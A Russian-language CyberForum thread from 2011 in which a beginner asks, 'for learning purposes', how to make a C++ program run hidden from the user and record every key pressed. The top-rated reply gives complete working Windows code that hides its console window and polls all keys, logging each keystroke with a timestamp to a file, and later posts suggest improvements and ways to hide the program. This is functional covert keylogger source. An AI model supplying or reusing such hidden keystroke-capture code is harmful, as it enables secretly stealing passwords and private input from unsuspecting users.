Форум программистов, компьютерный форум CyberForum.ru
Наши страницы

С++ для начинающих

Войти
Регистрация
Восстановить пароль
 
Van111
кодер с++
209 / 188 / 4
Регистрация: 03.08.2011
Сообщений: 2,597
Записей в блоге: 12
#1

а как сделать так - C++

25.09.2011, 18:55. Просмотров 308. Ответов 4
Метки нет (Все метки)

нужно чтоб при запуске програма работала не как приложение а как процесс то есть юзеру была не видна
и ловила все нажатые пользователям кнопки
(мне это нужно тока в учебных целях)
0
Лучшие ответы (1)
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
25.09.2011, 18:55
Здравствуйте! Я подобрал для вас темы с ответами на вопрос а как сделать так (C++):

Как сделать так что я мог умножать не на два числа а на 3,4,5 и так далее? - C++
Вот код: #include <iostream> #include <conio.h> using namespace std; int main(){ float a,c; char b; skip: ...

Сделать так, чтобы функция возвращала как целые, так и дробные значения - C++
Задача: нужно найти среднее арифметическое чисел в одномерном массиве разных типов. В main() у пользователя спрашивается размер...

Как сделать, так чтобы программа выводила наименование цвета, как здесь? - C++
http://colors.aeio.ru/color/fffffe Я создал базу из 1002 цветов но это вообще не то. Я подгрузил изображение в 2тыс пикселей. И программа...

Как сделать так,чтобы - C++
Собственно,здрасте. Собственно,я новичок в с++. В общем у меня возник вопрос: Сперва приведу пример,иначе не могу объяснить: int...

Как сделать так, чтобы число не повторялось? - C++
Вопрос следующий. В определенном диапазоне (например от 0 до 9) лежат числа, нужно сделать так, чтобы весь диапазон был выведен на экран,...

Как сделать так что бы выводило не -1.#IND - C++
#include<iostream> #include<math.h> using namespace std; class A { double x,y,z; double b; public: void...

Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
xAtom
915 / 740 / 60
Регистрация: 09.12.2010
Сообщений: 1,346
Записей в блоге: 1
25.09.2011, 22:53 #2
Лучший ответ Сообщение было отмечено автором темы, экспертом или модератором как ответ
Цитата Сообщение от Van111 Посмотреть сообщение
нужно чтоб при запуске програма работала не как приложение а как процесс то есть юзеру была не видна
Имеешь ввиду как работают Windows-службы в системах-NT, я вот тут набросал не большой код простого консольного приложения "человека-невидимки" времени нет службу паять, вот код только для ОС Win NT.
C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#include <stdio.h>
#include <windows.h>
 
int main(void) {
   SYSTEMTIME  tm;
   int   key;
   FILE* fp;
   HWND  wnd = GetForegroundWindow();
  // уменьшить приоритет процесса
   SetPriorityClass(GetCurrentProcess(), IDLE_PRIORITY_CLASS);
 
  // файл для сохранения информаци о нажатой клавиши
  if(!(fp = fopen("D:\\keys.txt", "w+")))
       exit(1);
  fputs("Символ\tASCII-код\tДата/Время\n", fp);
 
  ShowWindow(wnd, SW_HIDE);
  while(1) {
       for(key = 3; key < 256; key++) {
           if(GetAsyncKeyState(key)) {
                 GetLocalTime(&tm);
                 fprintf(fp, "%c\t%d\t\t%d-%02d-%02d  %02d:%02d:%02d\n", 
                 key, key, tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
                 break;
          }
       }
       // при нажатие на клавишу End(процесс закрывается)
       if(GetAsyncKeyState(35)) 
           break;
       Sleep(100u);
   }
   ShowWindow(wnd, SW_SHOW);
   fflush(fp);
   fclose(fp);
 
   system("pause");
   return 0;
}
При запуске проги она исчезнит и будет сохранять в файл сведения любой нажатой квлавиши в системе, для закрытия процесса клавиша End(с работает в любом месте).
3
Чистый
Автор FAQ
2706 / 1402 / 73
Регистрация: 08.09.2011
Сообщений: 3,732
Записей в блоге: 1
26.09.2011, 11:22 #3
можно просто скрыть окно консоли, вот тут почитай:
Тыц 1
Тыц 2
0
Van111
кодер с++
209 / 188 / 4
Регистрация: 03.08.2011
Сообщений: 2,597
Записей в блоге: 12
26.09.2011, 16:36  [ТС] #4
а зачем уменьшать приоретет процеса?
fflush(fp) надо бы вставить после
fprintf(fp, "%c\t%d\t\t%d-%02d-%02d %02d:%02d:%02d\n",
key, key, tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
так надёжнее
0
kravam
быдлокодер
1695 / 882 / 45
Регистрация: 04.06.2008
Сообщений: 5,459
26.09.2011, 16:58 #5
Скрыть программу
0
MoreAnswers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
26.09.2011, 16:58
Привет! Вот еще темы с ответами:

Как сделать так, чтобы вернулась часть объекта? - C++
Поскольку в C++ возможно всё, вот я и решил, может и такое возможно? //Должна возвращаться часть этого объекта, class kl { ...

Как сделать так, чтобы запуск из *.exe не вылетал! - C++
Из командной строки все работает нормально, но запуск файла *.exe (этот файл я сам создовал, он откомпилированный!) не получается(( Как...

Как сделать так что бы массив выводил наоборот - C++
Как сделать так что бы массив выводил наоборот???

Как сделать так чтоб работало? Что с компилятором? - C++
ошибка: No such file or directory #include &lt;iostream&gt; using namespace std; int main() {const int n=15; int i;double...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
Yandex
Объявления
26.09.2011, 16:58
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2017, vBulletin Solutions, Inc.
Рейтинг@Mail.ru